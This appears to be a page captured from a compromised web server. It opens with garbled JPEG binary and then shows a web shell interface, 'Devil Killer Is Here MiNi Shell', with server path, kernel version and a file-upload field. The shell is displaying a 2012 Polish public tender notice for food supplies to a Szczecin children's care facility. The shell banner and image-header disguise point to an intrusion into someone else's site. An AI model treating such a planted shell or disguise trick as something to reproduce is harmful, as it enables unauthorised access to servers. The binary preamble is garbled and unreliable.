JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120605/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120605/187940-N-2012.html

<p class="kh_header"><b>Szczecin: ZAKUP I DOSTAWA ARTYKUŁÓW SPOŻYWCZYCH</b><br>
<b>Numer ogłoszenia: 187940 - 2012; data zamieszczenia: 05.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wielofunkcyjna Placówka Opiekuńczo-Wychowawcza im. Konstantego Maciejewicza w Szczecinie , ul. Wszystkich Świętych 66, 71-457 Szczecin, woj. zachodniopomorskie, tel. 91 4315891, faks 91 43115891 w. 21.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.po.szczecin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZAKUP I DOSTAWA ARTYKUŁÓW SPOŻYWCZYCH.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup i dostawa artykułów żywnościowych w następujących częściach:1) warzywa i owoce (zał. 1A), 2) produkty zwierzęce, mięso i produkty mięsne (zał.1B), 3) ryby przetworzone (zał.1C),  4) warzywa i owoce mrożone (zał.1D), 5)oleje i tłuszcze (zał.1E), 6) produkty mleczarskie (zał.1F), 7) produkty przemiału ziarna (zał.1G), 8) różne produkty spożywcze (zał.1H), 9) napoje (zał.1I), 10) pieczywo i pieczywo cukiernicze (zał.1J).  KOD PCV - określonych odpowiednio w załącznikach od 1A-1I. 2. Podane w załącznikach ilości są ilościami maksymalnymi i mogą  ulec zmniejszeniu w trakcie realizacji zamówienia. Zmniejszenie nie może przekroczyć 20%. Z tego tytułu nie będą przysługiwały Wykonawcy żadne roszczenia. 3. Wykonawca będzie wykonywał przedmiot umowy sukcesywnie, stosownie do pisemnych zleceń przekazywanych przez upoważnionego pracownika. 4.Terminy dostaw, asortyment i ilość towarów określona zostanie każdorazowo w pisemnym zamówieniu, które może być doręczone Wykonawcy za pomocą faxu, składanym przez Zamawiającego z co najmniej jednodniowym wyprzedzeniem. Dostawa zamówionych towarów będzie się odbywała w godzinach od 7.00 do 9.00 dnia następnego po złożeniu zamówienia. 5. Zamawiający dopuszcza możliwość składania ofert równoważnych. Nazwy własne takie jak: np. Jogobella, Gouda, Almette, Kit-Kat, Lion, zostały użyte przez zamawiającego jedynie przykładowo. Wykonawca może zaproponować inny produkt pod warunkiem, że odpowiada on określonym wymaganiom co produkt określony w SIWZ.  6. Wykonawca który powołuje się na rozwiązania równoważne opisywane przez Zamawiającego jest obowiązany wykazać, że oferowane przez niego dostawy spełniają wymagania, mają dołączyć do oferty opis produktów równoważnych z podaniem ich nazwy - jeżeli wykonawca przewiduje produkty równoważne (w przypadku o którym mowa w rozdziale 14 pkt. 5 siwz). 7. Oferta nie musi obejmować całości zamówienia, dopuszcza się składanie ofert częściowych. Wykonawca może złożyć ofertę na jedną, kilka lub wszystkie części zamówienia. Oferta częściowa musi obejmować wszystkie pozycje w danej części.  8. Zamówiony towar należy dostarczyć do magazynu na terenie Wielofunkcyjnej Placówki Opiekuńczo-Wychowawczej im. Konstantego Maciejewicza przy ul. Wszystkich Świętych 66 w Szczecinie..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 10.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena  spełnienia warunków dokonywana będzie na podstawie załączonego do oferty oświadczenia o treści określonej w załączniku nr 2 do specyfikacji istotnych warunków zamówienia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena  spełnienia warunków dokonywana będzie na podstawie załączonego do oferty oświadczenia  o treści określonej w załączniku nr 2 do specyfikacji istotnych warunków zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena  spełnienia warunków dokonywana będzie na podstawie załączonego do oferty oświadczenia  o treści określonej w załączniku nr 2 do specyfikacji istotnych warunków zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena  spełnienia warunków dokonywana będzie na podstawie załączonego do oferty oświadczenia  o treści określonej w załączniku nr 2 do specyfikacji istotnych warunków zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena  spełnienia warunków dokonywana będzie na podstawie załączonego do oferty oświadczenia  o treści określonej w załączniku nr 2 do specyfikacji istotnych warunków zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Inne dokumenty wymagane przez zamawiającego: 1) oferta cenowa zgodnie z Rozdziałem I pkt 3 siwz; w przypadku składania oferty wspólnej należy złożyć jeden dokument 2) odpowiednie pełnomocnictwa; tylko w sytuacjach określonych w Rozdziale I pkt 5 zdanie 2 siwz lub w przypadku składania oferty wspólnej (Rozdział III pkt 1 siwz), 3) oświadczenie według wzoru stanowiącego załącznik nr 1 do siwz wskazujące cześć zamówienia, której wykonanie wykonawca powierzy podwykonawcom (jeżeli wykonawca przewiduje udział podwykonawców); w przypadku składania oferty wspólnej należy złożyć jeden dokument, 4) kalkulacja cenowa według wzoru stanowiącego załącznik 1A-1J w zależności od części na którą wykonawca składa swoją ofertę.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Wszelkie zmiany niniejszej umowy mogą być dokonane za zgodą obu stron, zapisane w formie aneksu z zastrzeżeniem art.144 ustawy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.po.szczecin.pl, http://bip.um.szczecin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wielofunkcyjna Placówka Opiekuńczo-Wychowawcza im. K. Maciejewicza w Szczecinie ul.Wszystkich Świętych 66 , 71-457 Szczecin..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.06.2012 godzina 10:00, miejsce: Wielofunkcyjna Placówka Opiekuńczo-Wychowawcza im. K. Maciejewicza w Szczecinie ul.Wszystkich Świętych 66 , 71-457 Szczecin pok. nr 01..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> WARZYWA I OWOCE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Marchew, Cebula, Pietruszka korzeń, Seler korzeń, Seler z nacią, Buraki ćwikłowe, Por, Por - sezon  VI-VIII, Kapusta biała, Kapusta młoda-sezon V-VIII, Szczypior -sezon V-IX, Szczypior -pozostałe miesiące, Nać pietruszki -pozostałe miesiące, Koperek - sezon V-IX, Koperek-pozostałe miesiące, Kapusta czerwona,, Kapusta pekińska, Kalafior - sezon, Pomidory-sezon VI-X , Pomidory-pozostałe miesiące, Ogórki świeże gruntowe-sezon VII-IX, Ogórki świeże  -pozostałe miesiące, Papryka świeża kolorowa-sezon VII-IX, Papryka świeża kolorowa-pozostałe miesiące, Pieczarki , Sałata sezon V-VIII, Sałata pozostałe miesiące, Jabłka -sezon V-VII, Jabłka-pozostałe miesiące, Pomarańcze, Rzodkiewka -sezon  V-VIII, Rzodkiewka-pozostałe miesiące, Rzodkiew, Banany ,Kiwi, Cytryny, Mandarynka , Gruszki -sezon VII-IX, Gruszki-pozostałe miesiące, Nektarynki , Truskawka świeża-sezon VI-VIII, Brzoskwinie-sezon  VII-IX, Arbuz-sezon V-I.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.10.00-6, 03.22.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> PRODUKTY ZWIERZĘCE, MIĘSO I PRODUKTY MIĘSNE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Filet z kurczaka, Ćwiartka z kurczaka, Korpusy z kurczaka, Wątróbka drobiowa, Schab z kością, Żołądki drobiowe, Boczek świeży b/k i b/s, Boczek wędzony b/k i b/s, Karkówka wieprzowa b/k, Szynka wieprzowa b/k, Łopatka wieprzowa b/k, Kości wędzone, Kiełbasa wieprzowa cienka, Parówka drobiowa cienka, Polędwica drobiowa, Szynka drobiowa mielonka, Szynka wieprzowa gotowana, Kiełbasa Tatrzańska  lub 
równoważna, Blok Tyrolski lub równoważny, Kiełbasa jałowcowa, Kiełbasa Żywiecka, Kiełbasa Krakowska parzona, Kiełbasa szynkowa wieprzowa, Mortadela, Pasztet mięsny, Kaszanka, Ogonówka, Pieczeń rzymska, Pasztet drobiowy 135g; +/- 5%, Szynka wędzony, Konserwa mięsna 300g +/- 5%, Pasztetowa, Szynka konserwowa, Łopatka wołowa b/k.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> RYBY PRZETWORZONE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Filet z miruny z/s SHP 10%glazury, Filet z dorsza z/s 10% glazury, Filet z morszczuka 80-140g IQF 10% glazury, Tuńczyk  w oleju 185g;   +/- 5%, Paprykarz z łososia 152 g ; +/- 5%, Sałatka z makreli 300g +/- 5%, Makrela wędzona tusza..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> WARZYWA I OWOCE MROŻONE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Brokuły mrożone 10kg, Kalafior mrożony 10kg, Marchewka z groszkiem mrożona 10kg, Mrożonka kompotowa wielosmakowa 10kg, Mieszanka warzywna wieloskładnikowa mrożona  10kg, Groszek mrożony 10kg, Truskawka mrożona 10kg, Fasolka szparagowa mrożona 10kg..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.89.60.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> OLEJE I TŁUSZCZE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Olej rzepakowy  lub równoważny 1 L, Margaryna 250 g, Masło roślinne do kanapek 500 g  typu Delma lub równoważne, Olej rzepakowy lub równoważny 3L..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.40.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> PRODUKTY MLECZARSKIE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Mleko karton 3,2 % 1L, Śmietana kwaśna 12% 400g, Śmietana do zup i sosów 500ml, Karton +/- 5%,Twaróg śmietankowy półtłusty mielony  250g +/- 5%, Twaróg półtłusty krajanka, Jogurty owocowe 150 ml typu Jogobella lub równoważny    +/- 5% o wartości odżywczej w 100g : tłuszcz 1,19g - 2,5g, węglowodany 15g -17,3g, białko 2,9g -3,5g, wartość energetyczna 91kcal -97kcal, Masło exstra 200 g  +/- 5% zawartość  tłuszczu 83%, Ser żółty typu Gouda lub równoważny, Serek owocowy 150 g +/- 5% typu, Jogobella lub równoważny o wartości odżywczej w 100g : tłuszcz 3g - 5,5g, węglowodany 15,8g- 16g, białko 5,2g - 5,3g, wartość energetyczna 112kcal - 134kcal, Serek topiony zegar (8szt.) typu Hohland lub równoważny, Serek Almette lub równoważny  150 g +/- 5% o wartości odżywczej w 100g :tłuszcz 22g  - 23g, węglowodany 3g - 4g, białko 6g - 7g, wartość energetyczna  242kcal - 243kcal, Serek typu Pyszny Duet  lub równoważny  150 g +/- 5% o wartości odżywczej w 100g : tłuszcz 18g - 21g, węglowodany 3,2g - 4,7g,  białko 7g - 7,8g, wartość energetyczna 208kcal - 240kcal, Deser typu Danonki   lub równoważne, Ser topiony plastry typu Gouda lub równoważny  150g +/- 5%, Lody śmietankowe 150 g +/- 5%, Jaja kurze M.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> PRODUKTY  PRZEMIAŁU ZIARNA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Płatki owsiane 500 g  +/-5%, Płatki kukurydziane 1000 g +/- 5%, Chrupki kukurydziane 50g +/- 5%, Płatki kukurydziane czekoladowe 1000 g +/- 5%, Kasza jęczmienna 1000g  +/- 5%, Kasza manna  1000g +/- 5%, Kasza gryczana prażona 500g +/- 5%, Ryż biały 1000g +/- 5%, Mąka pszenna 1000g typ 500 +/- 5%, Mąka tortowa 1000g typ 450 +/- 5%, Kasza kukurydziana 500g +/- 5%.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.61.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> RÓŻNE PRODUKTY SPOŻYWCZE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cukier 1kg +/- 5%, Cukier puder 500g +/- 5%, Sól kuchenna typu jodowana miałka 1000g, Makaron 500g łazanka, Makaron 500g drobny typu gwiazdka, Makaron 500g kokardka, Makaron zacierka 250 g, Makaron 500g  świder, Makaron 500g  kolanko, Makaron 500g muszelka, Makaron 500g nitka, Makaron 500g rurka, Makaron spagetti 500 g., Kakao instant lub równoważne 800g +/- 50g, Napój herb. Cytrynowy 350g +/- 50g, Herbata granulowana typu Saga lub równoważna 100g, Herbata ekspresowa 100szt.typu Saga lub równoważna , Herbata ekspresowa owocowa  50szt.typu Saga lub równoważna , Kawa zbożowa (typu Inka) 150g  +/- 5%, Kakao 100g +/- 5%, Pieprz mielony 20g +/- 5%, Przyprawa do bigosu  29g +/-  5%, Przyprawa do drobiu 20g  +/- 5%, Przyprawa do mięsa 20g +/- 5%, Przyprawa do ryb 40g +/- 5%, Bazylia 10g +/- 5%, Curry  25g +/- 5%, Czosnek granulowany 40g +/- 5%, Kminek 20g +/- 5%, Liść laurowy 7g +/- 5%, Majeranek  10g +/- 5%, Oregano 10g +/- 5%, Papryka mielona słodka 20g +/-  5%, Przyprawa do potraw chińskich  29g +/- 5%, Przyprawa do zup 1000g +/- 5%, Ziele angielskie 15g +/- 5%, Barszcz biały 40g  +/- 5% , Ketchup łagodny 500g, Majonez  400g +/- 5%, Musztarda 210g +/- 5%, Miód wielokwiatowy 400g  +/- 5%, Proszek do pieczenia 18g  +/- 5%, Bąbolada lub  
